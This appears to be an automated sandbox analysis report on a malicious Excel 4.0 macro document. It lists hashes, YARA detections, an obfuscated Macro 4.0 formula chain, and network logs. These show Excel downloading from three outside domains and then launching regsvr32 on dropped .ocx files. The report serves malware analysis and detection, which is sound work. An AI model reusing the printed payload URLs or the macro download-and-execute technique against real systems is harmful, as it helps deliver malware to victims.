                                        PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        part-1500645108.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        invoice template 33142738819.docxGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        item-40567503.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        item-107262298.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        item-1202816963.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        box-1688169224.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        box-1689035414.xlsbGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\FFC2.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):1536
                                        Entropy (8bit):1.1464700112623651
                                        Encrypted:false
                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                        MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                        SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                        SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                        SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF3298678F3B11AF32.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):28672
                                        Entropy (8bit):2.9736664173647833
                                        Encrypted:false
                                        SSDEEP:768:9kxKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgALlNp:9oKpb8rGYrMPe3q7Q0XV5xtezEsi8/dh
                                        MD5:193AED4E8225F55CE53F3DE42895D51E
                                        SHA1:35C2A28EB87E87B40275737D4EE569B5D45BF237
                                        SHA-256:92B61AE08A4A89E9086400FC634F2A39313F3D685BDAF4810059B265CED6A12B
                                        SHA-512:C13251F8EB2434D37697F95B56EA9DF4B44AFC4A1FBBF45F1B765926C7E4AF45A91D0DB5EE835A5B109EB90106D2B368821E0A55D07C72A582856EE260D29CBD
                                        Malicious:false
                                        Reputation:low
                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF55CA0BB42F5D2008.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\Desktop\counter-1248368226.xls
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
                                        Category:dropped
                                        Size (bytes):132608
                                        Entropy (8bit):6.276321457389261
                                        Encrypted:false
                                        SSDEEP:3072:bKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQA:bKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgz3
                                        MD5:E265AA247D2C6CD7554013D78300C567
                                        SHA1:8937206AE6674A7FD2060CD3334A71E781141EB0
                                        SHA-256:F5E73916414A422DFD22643CB76EBA49CC75E5F9FE4100C6053D93DB7471206B
                                        SHA-512:6FD78031CA94B2A542AE2568D0578EDBAF6542C41AB2DAE38AC942C12D7E74AD1ADFACC50152C18DA85446C86965D4B5637FEF344D14C3A246E9ED00FE9C8383
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: John Lambert @JohnLaTwC
                                        • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: Joe Security
                                        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=...........................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
                                        Entropy (8bit):6.275934021202815
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 78.94%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                        File name:counter-1248368226.xls
                                        File size:132608
                                        MD5:30a0db47a66a3d3173457755bb166529
                                        SHA1:c852a219defe8ab726b72f8792386e35428b46dc
                                        SHA256:bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
                                        SHA512:ca0fb9713e25d2c3f1fa312c9318801ee7f97d4f0873501bd05de98bc0dc25020d7ae5f7fd88368dcbdc261c4a4d86a9ccc4c376ae85a014945b4cc7f572cb5d
                                        SSDEEP:3072:LKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQj:LKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzE
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea286a4b4bcb4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "counter-1248368226.xls"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Excel
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:True
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1251
                                        Author:
                                        Last Saved By:
                                        Create Time:2015-06-05 18:19:34
                                        Last Saved Time:2021-11-30 06:43:37
                                        Creating Application:Microsoft Excel
                                        Security:0

                                        Document Summary

                                        Document Code Page:1251
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:1048576

                                        Streams

                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.436875318248
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 8 . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S b r b u k 1 . . . . . S b o r 2 . . . . . S b 1 2 1 1 o r 1 . . . . . S h e e t . . . . . B o r 1 . . . . . B
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 38 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f8 00 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.279171118094
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . 2 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786
                                        General
                                        Stream Path:Workbook
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:121786
                                        Entropy:6.60410896716
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                        Macro 4.0 Code

                                        2,6,=
                                        9,2,=CHAR(Sbrbuk1!G26)
                                        
                                        1,5,=CHAR(Sbrbuk1!R27)
                                        12,1,e
                                        
                                        15,6,=FORMULA(Bor1!C8,Bor2!B12)=FORMULA(Bor2!H4,Bor3!G3)=FORMULA(Bor3!C10,Bor4!A2)=FORMULA(Bor4!F9,Bor5!C12)=FORMULA(Bor5!J5,Bor6!B13)=FORMULA(Bor6!F2,Bor1!I3)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!B7&Bor2!B12&Sb1211or1!E1&Bor2!B12&Sb1211or1!C13&Bor2!B12&Sb1211or1!A2&Bor2!B12&Sb1211or1!D4&Bor1!I3&Sb1211or1!A11&Bor1!I3&Sb1211or1!F7,G35)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!B10&Bor1!I3&Sbor2!E2,G37)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!J5&Bor1!I3&Sbor2!S5,G39)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!G8&Bor1!I3&Sbor2!P3,G41)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!O10,G43)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!D14,G45)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!L12,G47)=FORMULA(Bor3!G3&Sbrbuk1!M38&Sbrbuk1!M40&Sbrbuk1!M42&Sbrbuk1!M44&Sbrbuk1!M38&Sbrbuk1!L46,G49)
                                        
                                        3,7,=CHAR(Sbrbuk1!E31)
                                        11,1,r
                                        
                                        2,8,C
                                        7,2,=CHAR(Sbrbuk1!S32)
                                        
                                        1,0,A
                                        8,5,=CHAR(Sbrbuk1!J25)
                                        
                                        4,9,=CHAR(Sbrbuk1!N29)
                                        11,2,L
                                        

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 2, 2021 14:35:29.947393894 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:29.947455883 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:29.947544098 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:29.964345932 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:29.964411020 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:30.280414104 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:30.280651093 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:30.296716928 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:30.296788931 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:30.297111988 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:30.297243118 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:30.577886105 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:30.620884895 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:31.602302074 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:31.602427006 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:31.602519989 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:31.603028059 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:31.603625059 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:31.603651047 CET44349167108.179.192.98192.168.2.22
                                        Dec 2, 2021 14:35:31.603671074 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:31.603712082 CET49167443192.168.2.22108.179.192.98
                                        Dec 2, 2021 14:35:31.647346020 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:31.647392035 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:31.647780895 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:31.648155928 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:31.648174047 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:32.086457014 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:32.086704969 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:32.100457907 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:32.100490093 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:32.100862980 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:32.100970030 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:32.118309975 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:32.164889097 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:33.796027899 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:33.796092987 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:33.796153069 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:33.796168089 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:33.796381950 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:33.796397924 CET44349168103.28.36.171192.168.2.22
                                        Dec 2, 2021 14:35:33.796443939 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:33.796458006 CET49168443192.168.2.22103.28.36.171
                                        Dec 2, 2021 14:35:33.836416006 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:33.836468935 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:33.836549044 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:33.837266922 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:33.837292910 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:34.176381111 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:34.176624060 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:34.188776016 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:34.188803911 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:34.189208031 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:34.189313889 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:34.192473888 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:34.232873917 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:35.661617994 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:35.661725998 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:35.661808968 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:35.662249088 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:35.662410975 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:35.662429094 CET44349169162.241.2.78192.168.2.22
                                        Dec 2, 2021 14:35:35.662455082 CET49169443192.168.2.22162.241.2.78
                                        Dec 2, 2021 14:35:35.662482023 CET49169443192.168.2.22162.241.2.78

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 2, 2021 14:35:29.751640081 CET5216753192.168.2.228.8.8.8
                                        Dec 2, 2021 14:35:29.934091091 CET53521678.8.8.8192.168.2.22
                                        Dec 2, 2021 14:35:31.624744892 CET5059153192.168.2.228.8.8.8
                                        Dec 2, 2021 14:35:31.644722939 CET53505918.8.8.8192.168.2.22
                                        Dec 2, 2021 14:35:33.812778950 CET5780553192.168.2.228.8.8.8
                                        Dec 2, 2021 14:35:33.832423925 CET53578058.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Dec 2, 2021 14:35:29.751640081 CET192.168.2.228.8.8.80x42f8Standard query (0)greenflag.esp.brA (IP address)IN (0x0001)
                                        Dec 2, 2021 14:35:31.624744892 CET192.168.2.228.8.8.80x8996Standard query (0)noithat117.vnA (IP address)IN (0x0001)
                                        Dec 2, 2021 14:35:33.812778950 CET192.168.2.228.8.8.80x1fbaStandard query (0)playsis.com.brA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Dec 2, 2021 14:35:29.934091091 CET8.8.8.8192.168.2.220x42f8No error (0)greenflag.esp.br108.179.192.98A (IP address)IN (0x0001)
                                        Dec 2, 2021 14:35:31.644722939 CET8.8.8.8192.168.2.220x8996No error (0)noithat117.vn103.28.36.171A (IP address)IN (0x0001)
                                        Dec 2, 2021 14:35:33.832423925 CET8.8.8.8192.168.2.220x1fbaNo error (0)playsis.com.br162.241.2.78A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • greenflag.esp.br
                                        • noithat117.vn
                                        • playsis.com.br

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249167108.179.192.98443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        TimestampkBytes transferredDirectionData
                                        2021-12-02 13:35:30 UTC0OUTGET /yuINdRbM/tiynh.html HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: greenflag.esp.br
                                        Connection: Keep-Alive
                                        2021-12-02 13:35:31 UTC0INHTTP/1.1 200 OK
                                        Date: Thu, 02 Dec 2021 13:35:30 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.2249168103.28.36.171443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        TimestampkBytes transferredDirectionData
                                        2021-12-02 13:35:32 UTC0OUTGET /TSh7GBeIR/tiynh.html HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: noithat117.vn
                                        Connection: Keep-Alive
                                        2021-12-02 13:35:33 UTC0INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Date: Thu, 02 Dec 2021 13:35:33 GMT
                                        Server: LiteSpeed
                                        Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.2249169162.241.2.78443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        TimestampkBytes transferredDirectionData
                                        2021-12-02 13:35:34 UTC1OUTGET /qJSL1BN5V/tiynh.html HTTP/1.1
                                        Accept: */*
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: playsis.com.br
                                        Connection: Keep-Alive
                                        2021-12-02 13:35:35 UTC1INHTTP/1.1 200 OK
                                        Date: Thu, 02 Dec 2021 13:35:34 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:14:35:19
                                        Start date:02/12/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13faa0000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:35:30
                                        Start date:02/12/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
                                        Imagebase:0xff1b0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:35:30
                                        Start date:02/12/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
                                        Imagebase:0xff1b0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:14:35:30
                                        Start date:02/12/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
                                        Imagebase:0xff1b0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >